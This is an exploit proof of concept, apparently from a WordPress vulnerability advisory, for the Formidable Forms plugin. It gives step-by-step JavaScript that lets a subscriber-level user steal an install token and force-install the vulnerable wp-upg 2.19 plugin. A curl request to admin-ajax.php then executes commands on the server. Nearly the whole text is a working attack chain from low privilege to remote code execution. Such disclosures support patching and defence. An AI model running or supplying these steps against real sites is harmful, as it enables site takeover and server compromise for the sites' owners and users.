## https://sploitus.com/exploit?id=WPEX-ID:33765DA5-C56E-42C1-83DD-FCAAD976B402
1. As a Subscriber user, visit `/wp-admin/admin.php?page=formidable-welcome`
2. Run the following JavaScript code in the browser console:
var token = jQuery('a.button-primary.frm-button-primary')[0].href.replace(/^.*token=(\w+).*$/, '$1');
await fetch( `/wp-json/frm-admin/v1/install-addon?token=${token}&file_url=https://downloads.wordpress.org/plugin/wp-upg.2.19.zip` );
3. Note that version 2.19 of the `wp-upg` plugin has been installed, despite being closed and having a known security vulnerability. Any version of any WordPress.org plugin could be installed here.
4. For RCE with the `wp-upg` plugin, run the following `curl` command:
curl -i 'https://SITE_URL/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:id:NULL:NULL'